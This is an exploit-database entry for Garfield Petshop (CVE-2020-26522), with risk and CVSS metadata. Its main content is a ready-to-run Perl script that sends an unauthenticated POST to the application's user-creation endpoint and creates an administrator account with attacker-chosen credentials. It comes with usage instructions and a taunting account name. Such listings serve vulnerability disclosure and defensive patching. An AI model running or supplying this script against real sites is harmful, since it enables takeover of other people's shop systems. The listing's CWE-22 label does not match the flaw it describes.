Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Garfield Petshop 2020-10-01 Cross Site Request Forgery
2020.10.09
Credit:
Ramdan Yantu
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2020-26522
CWE:
CWE-22
CWE-352
Ogólna skala CVSS:
6.8/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
#!/usr/bin/perl # Garfield Petshop (Add-Admin) Exploit # By Ramdan Yantu rysec.io \ bastardlabs.info # From Gorontalo - Indonesia # Mail: ramdanyantu__at__gmail.com # Application by Gamma Advertisa # Link: https://detapos.co/ | https://demo.detapos.co.id/petshop # CVE: CVE-2020-26522 use strict; use warnings; use LWP::UserAgent; my ($url, $path, $usernm, $passwd) = @ARGV ; unless($ARGV[3]){ print "\n-+--[ Brought to you by Ramdan Yantu ]--+-\n"; print "-+-- rysec.io / bastardlabs.info --+-\n"; print "-+--[ Garfield Petshop Add-Admin Exploit ]--+-\n"; print "\nUsage:\n\n"; print "perl $0 [target] [path] [username] [password]\n"; print "ex: perl $0 http://target.com /petshop/ w00t w00t\n"; exit (); } my $ua = LWP::UserAgent->new( agent => "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1)" ); my $ob = $ua->post( $url.$path."/mod/user/act_user.php?mod=user&act=simpan", { "nama_lengkap" => "u h4V3 833n 0wN3D", "usernm" => $usernm, "passwd" => $passwd, "rpasswd" => $passwd, "level" => "admin" } ); if($ob->is_success != -1) { print "\n [+] splo!it successfully!\n". "\n username: $usernm\n". " password: $passwd\n"; }else{ print "[-] splo!t failed! Maybe ente kurang tamvan!\n"; }
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top